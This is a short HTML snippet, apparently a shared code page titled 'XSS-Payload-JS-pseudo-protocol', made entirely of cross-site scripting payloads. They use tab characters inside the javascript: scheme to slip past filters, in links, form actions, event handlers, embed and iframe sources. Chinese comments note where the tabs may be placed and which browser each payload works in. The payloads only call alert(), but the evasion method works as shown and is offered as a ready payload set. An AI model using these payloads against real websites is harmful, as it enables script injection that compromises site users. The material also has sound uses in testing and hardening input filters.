XSS-Payload-JS-pseudo-protocol
by zicai
HTML
<!-- JavaScript 伪协议:在任意位置插入 	 -->
<a href="javas	cript	:		alert('a-href')">click me</a>
<form action="javas	cript	:		alert('form-action')">
<button>submit</button>
</form>
<span onmouseover="javascript	:		alert('event handler')">hover me</span><!-- 只能在冒号前后插入 -->
<embed src="javas	cript	:		alert('embed-src')" type=""><!-- only firefox -->
<iframe src="javas	cript	:		alert('iframe-src')" frameborder="0"></iframe>